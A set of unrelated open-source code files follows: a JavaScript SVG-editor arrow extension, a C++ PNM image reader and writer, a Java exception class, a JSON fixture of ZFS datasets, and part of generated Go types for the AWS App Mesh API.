var defs = S.findDefs();
$.each(mtypes, function(i, type) {
var marker = getLinked(elem, 'marker-'+type);
if(!marker) return;
var cur_color = $(marker).children().attr('fill');
var cur_d = $(marker).children().attr('d');
var new_marker = null;
if(cur_color === color) return;
var all_markers = $(defs).find('marker');
// Different color, check if already made
all_markers.each(function() {
var attrs = $(this).children().attr(['fill', 'd']);
if(attrs.fill === color && attrs.d === cur_d) {
// Found another marker with this color and this path
new_marker = this;
}
});
if(!new_marker) {
// Create a new marker with this color
var last_id = marker.id;
var dir = last_id.indexOf('_fw') !== -1?'fw':'bk';
new_marker = addMarker(dir, type, arrowprefix + dir + all_markers.length);
$(new_marker).children().attr('fill', color);
}
$(elem).attr('marker-'+type, "url(#" + new_marker.id + ")");
// Check if last marker can be removed
var remove = true;
$(S.svgcontent).find('line, polyline, path, polygon').each(function() {
var elem = this;
$.each(mtypes, function(j, mtype) {
if($(elem).attr('marker-' + mtype) === "url(#" + marker.id + ")") {
return remove = false;
}
});
if(!remove) return false;
});
// Not found, so can safely remove
if(remove) {
$(marker).remove();
}
});
}
return {
name: "Arrows",
context_tools: [{
type: "select",
panel: "arrow_panel",
title: "Select arrow type",
id: "arrow_list",
options: {
none: "No arrow",
end: "---->",
start: "<----",
both: "<--->",
mid: "-->--",
mid_bk: "--<--"
},
defval: "none",
events: {
change: setArrow
}
}],
callback: function() {
$('#arrow_panel').hide();
// Set ID so it can be translated in locale file
$('#arrow_list option')[0].id = 'connector_no_arrow';
},
addLangData: function(lang) {
return {
data: lang_list[lang]
};
},
selectedChanged: function(opts) {
// Use this to update the current selected elements
selElems = opts.elems;
var i = selElems.length;
var marker_elems = ['line','path','polyline','polygon'];
while(i--) {
var elem = selElems[i];
if(elem && $.inArray(elem.tagName, marker_elems) != -1) {
if(opts.selectedElement && !opts.multiselected) {
showPanel(true);
} else {
showPanel(false);
}
} else {
showPanel(false);
}
}
},
elementChanged: function(opts) {
var elem = opts.elems[0];
if(elem && (
elem.getAttribute("marker-start") ||
elem.getAttribute("marker-mid") ||
elem.getAttribute("marker-end")
)) {
// var start = elem.getAttribute("marker-start");
// var mid = elem.getAttribute("marker-mid");
// var end = elem.getAttribute("marker-end");
// Has marker, so see if it should match color
colorChanged(elem);
}
}
};
});
| {
"pile_set_name": "Github"
} |
/*
Copyright 2011, Ming-Yu Liu
All Rights Reserved
Permission to use, copy, modify, and distribute this software and
its documentation for any non-commercial purpose is hereby granted
without fee, provided that the above copyright notice appear in
all copies and that both that copyright notice and this permission
notice appear in supporting documentation, and that the name of
the author not be used in advertising or publicity pertaining to
distribution of the software without specific, written prior
permission.
THE AUTHOR DISCLAIMS ALL WARRANTIES WITH REGARD TO THIS SOFTWARE,
INCLUDING ALL IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
ANY PARTICULAR PURPOSE. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR
ANY SPECIAL, INDIRECT OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES
WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN
AN ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING
OUT OF OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE.
*/
#ifndef _image_io_h_
#define _image_io_h_
#include <cstdlib>
#include <climits>
#include <cstring>
#include <fstream>
#include "Image.h"
#define BUF_SIZE 256
class pnm_error
{
};
class ImageIO
{
public:
inline static Image<uchar> *LoadPBM(const char *name);
inline static Image<uchar> *LoadPGM(const char *name);
inline static Image<RGBMap> *LoadPPM(const char *name);
template <class T>inline void LoadImage(Image<T> **im, const char *name);
inline static void SavePBM(Image<uchar> *im, const char *name);
inline static void SavePGM(Image<uchar> *im, const char *name);
inline static void SavePPM(Image<RGBMap> *im, const char *name);
template <class T>inline void SaveImage(Image<T> *im, const char *name);
private:
inline static void read_packed(unsigned char *data, int size, std::ifstream &f);
inline static void write_packed(unsigned char *data, int size, std::ofstream &f);
inline static void pnm_read(std::ifstream &file, char *buf);
};
void ImageIO::read_packed(unsigned char *data, int size, std::ifstream &f)
{
unsigned char c = 0;
int bitshift = -1;
for (int pos = 0; pos < size; pos++)
{
if (bitshift == -1)
{
c = f.get();
bitshift = 7;
}
data[pos] = (c >> bitshift) & 1;
bitshift--;
}
}
void ImageIO::write_packed(unsigned char *data, int size, std::ofstream &f)
{
unsigned char c = 0;
int bitshift = 7;
for (int pos = 0; pos < size; pos++)
{
c = c | (data[pos] << bitshift);
bitshift--;
if ((bitshift == -1) || (pos == size-1))
{
f.put(c);
bitshift = 7;
c = 0;
}
}
}
/* read PNM field, skipping comments */
void ImageIO::pnm_read(std::ifstream &file, char *buf)
{
char doc[BUF_SIZE];
char c;
file >> c;
while (c == '#')
{
file.getline(doc, BUF_SIZE);
file >> c;
}
file.putback(c);
file.width(BUF_SIZE);
file >> buf;
file.ignore();
}
Image<uchar> *ImageIO::LoadPBM(const char *name)
{
char buf[BUF_SIZE];
/* read header */
std::ifstream file(name, std::ios::in | std::ios::binary);
pnm_read(file, buf);
if (strncmp(buf, "P4", 2))
throw pnm_error();
pnm_read(file, buf);
int width = atoi(buf);
pnm_read(file, buf);
int height = atoi(buf);
/* read data */
Image<uchar> *im = new Image<uchar>(width, height);
for (int i = 0; i < height; i++)
read_packed(imPtr(im, 0, i), width, file);
return im;
}
void ImageIO::SavePBM(Image<uchar> *im, const char *name)
{
int width = im->width();
int height = im->height();
std::ofstream file(name, std::ios::out | std::ios::binary);
file << "P4\n" << width << " " << height << "\n";
for (int i = 0; i < height; i++)
write_packed(imPtr(im, 0, i), width, file);
}
Image<uchar> *ImageIO::LoadPGM(const char *name)
{
char buf[BUF_SIZE];
/* read header */
std::ifstream file(name, std::ios::in | std::ios::binary);
pnm_read(file, buf);
if (strncmp(buf, "P5", 2))
return NULL;
pnm_read(file, buf);
int width = atoi(buf);
pnm_read(file, buf);
int height = atoi(buf);
pnm_read(file, buf);
if (atoi(buf) > UCHAR_MAX)
return NULL;
/* read data */
Image<uchar> *im = new Image<uchar>(width, height);
file.read((char *)imPtr(im, 0, 0), width * height * sizeof(uchar));
return im;
}
void ImageIO::SavePGM(Image<uchar> *im, const char *name)
{
int width = im->width();
int height = im->height();
std::ofstream file(name, std::ios::out | std::ios::binary);
file << "P5\n" << width << " " << height << "\n" << UCHAR_MAX << "\n";
file.write((char *)imPtr(im, 0, 0), width * height * sizeof(uchar));
}
Image<RGBMap> *ImageIO::LoadPPM(const char *name)
{
char buf[BUF_SIZE];
/* read header */
std::ifstream file(name, std::ios::in | std::ios::binary);
pnm_read(file, buf);
if (strncmp(buf, "P6", 2))
throw pnm_error();
pnm_read(file, buf);
int width = atoi(buf);
pnm_read(file, buf);
int height = atoi(buf);
pnm_read(file, buf);
if (atoi(buf) > UCHAR_MAX)
throw pnm_error();
/* read data */
Image<RGBMap> *im = new Image<RGBMap>(width, height);
file.read((char *)imPtr(im, 0, 0), width * height * sizeof(RGBMap));
return im;
}
void ImageIO::SavePPM(Image<RGBMap> *im, const char *name)
{
int width = im->width();
int height = im->height();
std::ofstream file(name, std::ios::out | std::ios::binary);
file << "P6\n" << width << " " << height << "\n" << UCHAR_MAX << "\n";
file.write((char *)imPtr(im, 0, 0), width * height * sizeof(RGBMap));
}
template <class T>
void ImageIO::LoadImage(Image<T> **im, const char *name)
{
char buf[BUF_SIZE];
/* read header */
std::ifstream file(name, std::ios::in | std::ios::binary);
pnm_read(file, buf);
if (strncmp(buf, "VLIB", 9))
throw pnm_error();
pnm_read(file, buf);
int width = atoi(buf);
pnm_read(file, buf);
int height = atoi(buf);
/* read data */
*im = new Image<T>(width, height);
file.read((char *)imPtr((*im), 0, 0), width * height * sizeof(T));
}
template <class T>
void ImageIO::SaveImage(Image<T> *im, const char *name)
{
int width = im->width();
int height = im->height();
std::ofstream file(name, std::ios::out | std::ios::binary);
file << "VLIB\n" << width << " " << height << "\n";
file.write((char *)imPtr(im, 0, 0), width * height * sizeof(T));
}
#endif
| {
"pile_set_name": "Github"
} |
/*
* Copyright Contributors to the OpenCue Project
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package com.imageworks.spcue;
import org.springframework.core.NestedRuntimeException;
@SuppressWarnings("serial")
public class DependencyManagerException extends NestedRuntimeException {
public DependencyManagerException(String arg0) {
super(arg0);
// TODO Auto-generated constructor stub
}
public DependencyManagerException(String arg0, Throwable arg1) {
super(arg0, arg1);
// TODO Auto-generated constructor stub
}
}
| {
"pile_set_name": "Github"
} |
{
"All": {
"rpool/ROOT/ubuntu_1234": {
"IsZsys": true,
"ID": "rpool/ROOT/ubuntu_1234",
"LastUsed": "2019-04-18T04:45:55+02:00",
"Datasets": {
"rpool/ROOT/ubuntu_1234": [
{
"Name": "rpool/ROOT/ubuntu_1234",
"Mountpoint": "/",
"CanMount": "on",
"BootFS": true,
"LastUsed": 1555555555
}
]
},
"AllUsersStates": {
"user1": {
"rpool/USERDATA/user1_abcd": {
"ID": "rpool/USERDATA/user1_abcd",
"LastUsed": "2018-12-10T13:20:44+01:00",
"Datasets": {
"rpool/USERDATA/user1_abcd": [
{
"Name": "rpool/USERDATA/user1_abcd",
"Mountpoint": "/home/user1",
"CanMount": "noauto",
"LastUsed": 1544444444
},
{
"Name": "rpool/USERDATA/user1_abcd/tools",
"Mountpoint": "/home/user1/tools",
"CanMount": "noauto",
"LastUsed": 1544444444
}
]
}
},
"rpool/USERDATA/user1_abcd@system-snapshot": {
"ID": "rpool/USERDATA/user1_abcd@system-snapshot",
"LastUsed": "2018-12-10T13:20:44+01:00",
"Datasets": {
"rpool/USERDATA/user1_abcd@system-snapshot": [
{
"Name": "rpool/USERDATA/user1_abcd@system-snapshot",
"IsSnapshot": true,
"Mountpoint": "/home/user1",
"CanMount": "noauto",
"LastUsed": 1544444444
},
{
"Name": "rpool/USERDATA/user1_abcd/tools@system-snapshot",
"IsSnapshot": true,
"Mountpoint": "/home/user1/tools",
"CanMount": "noauto",
"LastUsed": 1544444444
}
]
}
},
"rpool/USERDATA/user1_clone1": {
"ID": "rpool/USERDATA/user1_clone1",
"LastUsed": "2018-12-10T13:20:44+01:00",
"Datasets": {
"rpool/USERDATA/user1_clone1": [
{
"Name": "rpool/USERDATA/user1_clone1",
"Mountpoint": "/home/user1",
"CanMount": "noauto",
"LastUsed": 1544444444,
"Origin": "rpool/USERDATA/user1_abcd@system-snapshot"
},
{
"Name": "rpool/USERDATA/user1_clone1/tools",
"Mountpoint": "/home/user1/tools",
"CanMount": "noauto",
"LastUsed": 1544444444,
"Origin": "rpool/USERDATA/user1_abcd/tools@system-snapshot"
}
]
}
}
}
},
"History": {
"rpool/ROOT/ubuntu_1234@system-snapshot": {
"ID": "rpool/ROOT/ubuntu_1234@system-snapshot",
"LastUsed": "2018-12-10T13:20:44+01:00",
"Datasets": {
"rpool/ROOT/ubuntu_1234@system-snapshot": [
{
"Name": "rpool/ROOT/ubuntu_1234@system-snapshot",
"IsSnapshot": true,
"Mountpoint": "/",
"LastUsed": 1544444444
}
]
},
"Users": {
"user1": {
"ID": "rpool/USERDATA/user1_abcd@system-snapshot",
"LastUsed": "2018-12-10T13:20:44+01:00",
"Datasets": {
"rpool/USERDATA/user1_abcd@system-snapshot": [
{
"Name": "rpool/USERDATA/user1_abcd@system-snapshot",
"IsSnapshot": true,
"Mountpoint": "/home/user1",
"CanMount": "noauto",
"LastUsed": 1544444444
},
{
"Name": "rpool/USERDATA/user1_abcd/tools@system-snapshot",
"IsSnapshot": true,
"Mountpoint": "/home/user1/tools",
"CanMount": "noauto",
"LastUsed": 1544444444
}
]
}
}
}
}
}
}
},
"AllSystemDatasets": [
{
"Name": "rpool/ROOT/ubuntu_1234",
"Mountpoint": "/",
"CanMount": "on",
"BootFS": true,
"LastUsed": 1555555555
},
{
"Name": "rpool/ROOT/ubuntu_1234@system-snapshot",
"IsSnapshot": true,
"Mountpoint": "/",
"LastUsed": 1544444444
}
],
"AllUsersDatasets": [
{
"Name": "rpool/USERDATA/user1_abcd@system-snapshot",
"IsSnapshot": true,
"Mountpoint": "/home/user1",
"CanMount": "noauto",
"LastUsed": 1544444444
},
{
"Name": "rpool/USERDATA/user1_abcd/tools@system-snapshot",
"IsSnapshot": true,
"Mountpoint": "/home/user1/tools",
"CanMount": "noauto",
"LastUsed": 1544444444
},
{
"Name": "rpool/USERDATA/user1_clone1",
"Mountpoint": "/home/user1",
"CanMount": "noauto",
"LastUsed": 1544444444,
"Origin": "rpool/USERDATA/user1_abcd@system-snapshot"
},
{
"Name": "rpool/USERDATA/user1_clone1/tools",
"Mountpoint": "/home/user1/tools",
"CanMount": "noauto",
"LastUsed": 1544444444,
"Origin": "rpool/USERDATA/user1_abcd/tools@system-snapshot"
}
],
"UnmanagedDatasets": [
{
"Name": "rpool",
"Mountpoint": "/",
"CanMount": "off"
},
{
"Name": "rpool/ROOT",
"Mountpoint": "/ROOT",
"CanMount": "off"
},
{
"Name": "rpool/USERDATA",
"Mountpoint": "/USERDATA",
"CanMount": "off"
}
]
} | {
"pile_set_name": "Github"
} |
// Code generated by smithy-go-codegen DO NOT EDIT.
package types
import (
"time"
)
// An object that represents the access logging information for a virtual node.
type AccessLog interface {
isAccessLog()
}
// The file object to send virtual node access logs to.
type AccessLogMemberFile struct {
Value *FileAccessLog
}
func (*AccessLogMemberFile) isAccessLog() {}
// An object that represents the AWS Cloud Map attribute information for your
// virtual node.
type AwsCloudMapInstanceAttribute struct {
// The name of an AWS Cloud Map service instance attribute key. Any AWS Cloud Map
// service instance that contains the specified key and value is returned.
Key *string
// The value of an AWS Cloud Map service instance attribute key. Any AWS Cloud Map
// service instance that contains the specified key and value is returned.
Value *string
}
// An object that represents the AWS Cloud Map service discovery information for
// your virtual node.
type AwsCloudMapServiceDiscovery struct {
// The name of the AWS Cloud Map namespace to use.
NamespaceName *string
// The name of the AWS Cloud Map service to use.
ServiceName *string
// A string map that contains attributes with values that you can use to filter
// instances by any custom attribute that you specified when you registered the
// instance. Only instances that match all of the specified key/value pairs will be
// returned.
Attributes []*AwsCloudMapInstanceAttribute
}
// An object that represents the backends that a virtual node is expected to send
// outbound traffic to.
type Backend interface {
isBackend()
}
// Specifies a virtual service to use as a backend for a virtual node.
type BackendMemberVirtualService struct {
Value *VirtualServiceBackend
}
func (*BackendMemberVirtualService) isBackend() {}
// An object that represents the default properties for a backend.
type BackendDefaults struct {
// A reference to an object that represents a client policy.
ClientPolicy *ClientPolicy
}
// An object that represents a client policy.
type ClientPolicy struct {
// A reference to an object that represents a Transport Layer Security (TLS) client
// policy.
Tls *ClientPolicyTls
}
// An object that represents a Transport Layer Security (TLS) client policy.
type ClientPolicyTls struct {
// Whether the policy is enforced. The default is True, if a value isn't specified.
Enforce *bool
// One or more ports that the policy is enforced for.
Ports []*int32
// A reference to an object that represents a TLS validation context.
Validation *TlsValidationContext
}
// An object that represents the DNS service discovery information for your virtual
// node.
type DnsServiceDiscovery struct {
// Specifies the DNS service discovery hostname for the virtual node.
Hostname *string
}
// An object that represents a duration of time.
type Duration struct {
// A number of time units.
Value *int64
// A unit of time.
Unit DurationUnit
}
// An object that represents the egress filter rules for a service mesh.
type EgressFilter struct {
// The egress filter type. By default, the type is DROP_ALL, which allows egress
// only from virtual nodes to other defined resources in the service mesh (and any
// traffic to *.amazonaws.com for AWS API calls). You can set the egress filter
// type to ALLOW_ALL to allow egress to any endpoint inside or outside of the
// service mesh.
Type EgressFilterType
}
// An object that represents an access log file.
type FileAccessLog struct {
// The file path to write access logs to. You can use /dev/stdout to send access
// logs to standard out and configure your Envoy container to use a log driver,
// such as awslogs, to export the access logs to a log storage service such as
// Amazon CloudWatch Logs. You can also specify a path in the Envoy container's
// file system to write the files to disk. The Envoy process must have write
// permissions to the path that you specify here. Otherwise, Envoy fails to
// bootstrap properly.
Path *string
}
// An object that represents a gateway route returned by a describe operation.
type GatewayRouteData struct {
// The name of the service mesh that the resource resides in.
MeshName *string
// The name of the gateway route.
GatewayRouteName *string
// The virtual gateway that the gateway route is associated with.
VirtualGatewayName *string
// The specifications of the gateway route.
Spec *GatewayRouteSpec
// An object that represents metadata for a resource.
Metadata *ResourceMetadata
// The status of the gateway route.
Status *GatewayRouteStatus
}
// An object that represents a gateway route returned by a list operation.
type GatewayRouteRef struct {
// The name of the service mesh that the resource resides in.
MeshName *string
// The name of the gateway route.
GatewayRouteName *string
// The virtual gateway that the gateway route is associated with.
VirtualGatewayName *string
// The AWS IAM account ID of the service mesh owner. If the account ID is not your
// own, then it's the ID of the account that shared the mesh with your account. For
// more information about mesh sharing, see Working with shared meshes
// (https://docs.aws.amazon.com/app-mesh/latest/userguide/sharing.html).
MeshOwner *string
// The AWS IAM account ID of the resource owner. If the account ID is not your own,
// then it's the ID of the mesh owner or of another account that the mesh is shared
// with. For more information about mesh sharing, see Working with shared meshes
// (https://docs.aws.amazon.com/app-mesh/latest/userguide/sharing.html).
ResourceOwner *string
// The full Amazon Resource Name (ARN) for the gateway route.
Arn *string
// The version of the resource. Resources are created at version 1, and this
// version is incremented each time that they're updated.
Version *int64
// The Unix epoch timestamp in seconds for when the resource was created.
CreatedAt *time.Time
// The Unix epoch timestamp in seconds for when the resource was last updated.
LastUpdatedAt *time.Time
}
// An object that represents a gateway route specification. Specify one gateway
// route type.
type GatewayRouteSpec struct {
// An object that represents the specification of an HTTP gateway route.
HttpRoute *HttpGatewayRoute
// An object that represents the specification of an HTTP/2 gateway route.
Http2Route *HttpGatewayRoute
// An object that represents the specification of a gRPC gateway route.
GrpcRoute *GrpcGatewayRoute
}
// An object that represents the current status of a gateway route.
type GatewayRouteStatus struct {
// The current status for the gateway route.
Status GatewayRouteStatusCode
}
// An object that represents a gateway route target.
type GatewayRouteTarget struct {
// An object that represents a virtual service gateway route target.
VirtualService *GatewayRouteVirtualService
}
// An object that represents the virtual service that traffic is routed to.
type GatewayRouteVirtualService struct {
// The name of the virtual service that traffic is routed to.
VirtualServiceName *string
}
// An object that represents a gRPC gateway route.
type GrpcGatewayRoute struct {
// An object that represents the criteria for determining a request match.
Match *GrpcGatewayRouteMatch
// An object that represents the action to take if a match is determined.
Action *GrpcGatewayRouteAction
}
// An object that represents the action to take if a match is determined.
type GrpcGatewayRouteAction struct {
// An object that represents the target that traffic is routed to when a request
// matches the gateway route.
Target *GatewayRouteTarget
}
// An object that represents the criteria for determining a request match.
type GrpcGatewayRouteMatch struct {
// The fully qualified domain name for the service to match from the request.
ServiceName *string
}
// An object that represents a retry policy. Specify at least one value for at
// least one of the types of RetryEvents, a value for maxRetries, and a value for
// perRetryTimeout.
type GrpcRetryPolicy struct {
// An object that represents a duration of time.
PerRetryTimeout *Duration
// The maximum number of retry attempts.
MaxRetries *int64
// Specify at least one of the following values.
//
// * server-error – HTTP status
// codes 500, 501, 502, 503, 504, 505, 506, 507, 508, 510, and 511
//
// *
// gateway-error – HTTP status codes 502, 503, and 504
//
// * client-error – HTTP
// status code 409
//
// * stream-error – Retry on refused stream
HttpRetryEvents []*string
// Specify a valid value.
TcpRetryEvents []TcpRetryPolicyEvent
// Specify at least one of the valid values.
GrpcRetryEvents []GrpcRetryPolicyEvent
}
// An object that represents a gRPC route type.
type GrpcRoute struct {
// An object that represents the action to take if a match is determined.
Action *GrpcRouteAction
// An object that represents the criteria for determining a request match.
Match *GrpcRouteMatch
// An object that represents a retry policy.
RetryPolicy *GrpcRetryPolicy
// An object that represents types of timeouts.
Timeout *GrpcTimeout
}
// An object that represents the action to take if a match is determined.
type GrpcRouteAction struct {
// An object that represents the targets that traffic is routed to when a request
// matches the route.
WeightedTargets []*WeightedTarget
}
// An object that represents the criteria for determining a request match.
type GrpcRouteMatch struct {
// The fully qualified domain name for the service to match from the request.
ServiceName *string
// The method name to match from the request. If you specify a name, you must also
// specify a serviceName.
MethodName *string
// An object that represents the data to match from the request.
Metadata []*GrpcRouteMetadata
}
// An object that represents the match metadata for the route.
type GrpcRouteMetadata struct {
// The name of the route.
Name *string
// Specify True to match anything except the match criteria. The default value is
// False.
Invert *bool
// An object that represents the data to match from the request.
Match GrpcRouteMetadataMatchMethod
}
// An object that represents the match method. Specify one of the match values.
type GrpcRouteMetadataMatchMethod interface {
isGrpcRouteMetadataMatchMethod()
}
// The value sent by the client must match the specified value exactly.
type GrpcRouteMetadataMatchMethodMemberExact struct {
Value string
}
func (*GrpcRouteMetadataMatchMethodMemberExact) isGrpcRouteMetadataMatchMethod() {}
// The value sent by the client must include the specified characters.
type GrpcRouteMetadataMatchMethodMemberRegex struct {
Value string
}
func (*GrpcRouteMetadataMatchMethodMemberRegex) isGrpcRouteMetadataMatchMethod() {}
// An object that represents the range of values to match on.
type GrpcRouteMetadataMatchMethodMemberRange struct {
Value *MatchRange
}
func (*GrpcRouteMetadataMatchMethodMemberRange) isGrpcRouteMetadataMatchMethod() {}
// The value sent by the client must begin with the specified characters.
type GrpcRouteMetadataMatchMethodMemberPrefix struct {
Value string
}
func (*GrpcRouteMetadataMatchMethodMemberPrefix) isGrpcRouteMetadataMatchMethod() {}
// The value sent by the client must end with the specified characters.
type GrpcRouteMetadataMatchMethodMemberSuffix struct {
Value string
}
func (*GrpcRouteMetadataMatchMethodMemberSuffix) isGrpcRouteMetadataMatchMethod() {}
// An object that represents types of timeouts.
type GrpcTimeout struct {
// An object that represents a per request timeout. The default value is 15
// seconds. If you set a higher timeout, then make sure that the higher value is
// set for each App Mesh resource in a conversation. For example, if a virtual node
// backend uses a virtual router provider to route to another virtual node, then
// the timeout should be greater than 15 seconds for the source and destination
// virtual node and the route.
PerRequest *Duration
// An object that represents an idle timeout. An idle timeout bounds the amount of
// time that a connection may be idle. The default value is none.
Idle *Duration
}
// An object that represents the method and value to match with the header value
// sent in a request. Specify one match method.
type HeaderMatchMethod interface {
isHeaderMatchMethod()
}
// The value sent by the client must match the specified value exactly.
type HeaderMatchMethodMemberExact struct {
Value string
}
func (*HeaderMatchMethodMemberExact) isHeaderMatchMethod() {}
// The value sent by the client must include the specified characters.
type HeaderMatchMethodMemberRegex struct {
Value string
}
func (*HeaderMatchMethodMemberRegex) isHeaderMatchMethod() {}
// An object that represents the range of values to match on.
type HeaderMatchMethodMemberRange struct {
Value *MatchRange
}
func (*HeaderMatchMethodMemberRange) isHeaderMatchMethod() {}
// The value sent by the client must begin with the specified characters.
type HeaderMatchMethodMemberPrefix struct {
Value string
}
func (*HeaderMatchMethodMemberPrefix) isHeaderMatchMethod() {}
// The value sent by the client must end with the specified characters.
type HeaderMatchMethodMemberSuffix struct {
Value string
}
func (*HeaderMatchMethodMemberSuffix) isHeaderMatchMethod() {}
// An object that represents the health check policy for a virtual node's listener.
type HealthCheckPolicy struct {
// The amount of time to wait when receiving a response from the health check, in
// milliseconds.
TimeoutMillis *int64
// The time period in milliseconds between each health check execution.
IntervalMillis *int64
// The protocol for the health check request. If you specify grpc, then your
// service must conform to the GRPC Health Checking Protocol
// (https://github.com/grpc/grpc/blob/master/doc/health-checking.md).
Protocol PortProtocol
// The destination port for the health check request. This port must match the port
// defined in the PortMapping () for the listener.
Port *int32
// The destination path for the health check request. This value is only used if
// the specified protocol is HTTP or HTTP/2. For any other protocol, this value is
// ignored.
Path *string
// The number of consecutive successful health checks that must occur before
// declaring listener healthy.
HealthyThreshold *int32
// The number of consecutive failed health checks that must occur before declaring
// a virtual node unhealthy.
UnhealthyThreshold *int32
}
// An object that represents an HTTP gateway route.
type HttpGatewayRoute struct {
// An object that represents the criteria for determining a request match.
Match *HttpGatewayRouteMatch
// An object that represents the action to take if a match is determined.
Action *HttpGatewayRouteAction
}
// An object that represents the action to take if a match is determined.
type HttpGatewayRouteAction struct {
// An object that represents the target that traffic is routed to when a request
// matches the gateway route.
Target *GatewayRouteTarget
}
// An object that represents the criteria for determining a request match.
type HttpGatewayRouteMatch struct {
// Specifies the path to match requests with. This parameter must always start with
// /, which by itself matches all requests to the virtual service name. You can
// also match for path-based routing of requests. For example, if your virtual
// service name is my-service.local and you want the route to match requests to
// my-service.local/metrics, your prefix should be /metrics.
Prefix *string
}
// An object that represents a retry policy. Specify at least one value for at
// least one of the types of RetryEvents, a value for maxRetries, and a value for
// perRetryTimeout.
type HttpRetryPolicy struct {
// An object that represents a duration of time.
PerRetryTimeout *Duration
// The maximum number of retry attempts.
MaxRetries *int64
// Specify at least one of the following values.
//
// * server-error – HTTP status
// codes 500, 501, 502, 503, 504, 505, 506, 507, 508, 510, and 511
//
// *
// gateway-error – HTTP status codes 502, 503, and 504
//
// * client-error – HTTP
// status code 409
//
// * stream-error – Retry on refused stream
HttpRetryEvents []*string
// Specify a valid value.
TcpRetryEvents []TcpRetryPolicyEvent
}
// An object that represents an HTTP or HTTP/2 route type.
type HttpRoute struct {
// An object that represents the criteria for determining a request match.
Match *HttpRouteMatch
// An object that represents the action to take if a match is determined.
Action *HttpRouteAction
// An object that represents a retry policy.
RetryPolicy *HttpRetryPolicy
// An object that represents types of timeouts.
Timeout *HttpTimeout
}
// An object that represents the action to take if a match is determined.
type HttpRouteAction struct {
// An object that represents the targets that traffic is routed to when a request
// matches the route.
WeightedTargets []*WeightedTarget
}
// An object that represents the HTTP header in the request.
type HttpRouteHeader struct {
// A name for the HTTP header in the client request that will be matched on.
Name *string
// Specify True to match anything except the match criteria. The default value is
// False.
Invert *bool
// The HeaderMatchMethod object.
Match HeaderMatchMethod
}
// An object that represents the requirements for a route to match HTTP requests
// for a virtual router.
type HttpRouteMatch struct {
// Specifies the path to match requests with. This parameter must always start with
// /, which by itself matches all requests to the virtual service name. You can
// also match for path-based routing of requests. For example, if your virtual
// service name is my-service.local and you want the route to match requests to
// my-service.local/metrics, your prefix should be /metrics.
Prefix *string
// The client request method to match on. Specify only one.
Method HttpMethod
// The client request scheme to match on. Specify only one.
Scheme HttpScheme
// An object that represents the client request headers to match on.
Headers []*HttpRouteHeader
}
// An object that represents types of timeouts.
type HttpTimeout struct {
// An object that represents a duration of time.
PerRequest *Duration
// An object that represents a duration of time.
Idle *Duration
}
// An object that represents a listener for a virtual node.
type Listener struct {
// The port mapping information for the listener.
PortMapping *PortMapping
// A reference to an object that represents the Transport Layer Security (TLS)
// properties for a listener.
Tls *ListenerTls
// The health check information for the listener.
HealthCheck *HealthCheckPolicy
// An object that represents timeouts for different protocols.
Timeout ListenerTimeout
}
// An object that represents timeouts for different protocols.
type ListenerTimeout interface {
isListenerTimeout()
}
// An object that represents types of timeouts.
type ListenerTimeoutMemberTcp struct {
Value *TcpTimeout
}
func (*ListenerTimeoutMemberTcp) isListenerTimeout() {}
// An object that represents types of timeouts.
type ListenerTimeoutMemberHttp struct {
Value *HttpTimeout
}
func (*ListenerTimeoutMemberHttp) isListenerTimeout() {}
// An object that represents types of timeouts.
type ListenerTimeoutMemberHttp2 struct {
Value *HttpTimeout
}
func (*ListenerTimeoutMemberHttp2) isListenerTimeout() {}
// An object that represents types of timeouts.
type ListenerTimeoutMemberGrpc struct {
Value *GrpcTimeout
}
func (*ListenerTimeoutMemberGrpc) isListenerTimeout() {}
// An object that represents the Transport Layer Security (TLS) properties for a
// listener.
type ListenerTls struct {
// Specify one of the following modes.
//
// * STRICT – Listener only accepts
// connections with TLS enabled.
//
// * PERMISSIVE – Listener accepts connections
// with or without TLS enabled.
//
// * DISABLED – Listener only accepts connections
// without TLS.
Mode ListenerTlsMode
// A reference to an object that represents a listener's TLS certificate.
Certificate ListenerTlsCertificate
}
// An object that represents an AWS Certicate Manager (ACM) certificate.
type ListenerTlsAcmCertificate struct {
// The Amazon Resource Name (ARN) for the certificate. The certificate must meet
// specific requirements and you must have proxy authorization enabled. For more
// information, see Transport Layer Security (TLS)
// (https://docs.aws.amazon.com/app-mesh/latest/userguide/tls.html#virtual-node-tls-prerequisites).
CertificateArn *string
}
// An object that represents a listener's Transport Layer Security (TLS)
// certificate.
type ListenerTlsCertificate interface {
isListenerTlsCertificate()
}
// A reference to an object that represents an AWS Certicate Manager (ACM)
// certificate.
type ListenerTlsCertificateMemberAcm struct {
Value *ListenerTlsAcmCertificate
}
func (*ListenerTlsCertificateMemberAcm) isListenerTlsCertificate() {}
// A reference to an object that represents a local file certificate.
type ListenerTlsCertificateMemberFile struct {
Value *ListenerTlsFileCertificate
}
func (*ListenerTlsCertificateMemberFile) isListenerTlsCertificate() {}
// An object that represents a local file certificate. The certificate must meet
// specific requirements and you must have proxy authorization enabled. For more
// information, see Transport Layer Security (TLS)
// (https://docs.aws.amazon.com/app-mesh/latest/userguide/tls.html#virtual-node-tls-prerequisites).
type ListenerTlsFileCertificate struct {
// The certificate chain for the certificate.
CertificateChain *string
// The private key for a certificate stored on the file system of the virtual node
// that the proxy is running on.
PrivateKey *string
}
// An object that represents the logging information for a virtual node.
type Logging struct {
// The access log configuration for a virtual node.
AccessLog AccessLog
}
// An object that represents the range of values to match on. The first character
// of the range is included in the range, though the last character is not. For
// example, if the range specified were 1-100, only values 1-99 would be matched.
type MatchRange struct {
// The start of the range.
Start *int64
// The end of the range.
End *int64
}
// An object that represents a service mesh returned by a describe operation.
type MeshData struct {
// The name of the service mesh.
MeshName *string
// The associated specification for the service mesh.
Spec *MeshSpec
// The associated metadata for the service mesh.
Metadata *ResourceMetadata
// The status of the service mesh.
Status *MeshStatus
}
// An object that represents a service mesh returned by a list operation.
type MeshRef struct {
// The name of the service mesh.
MeshName *string
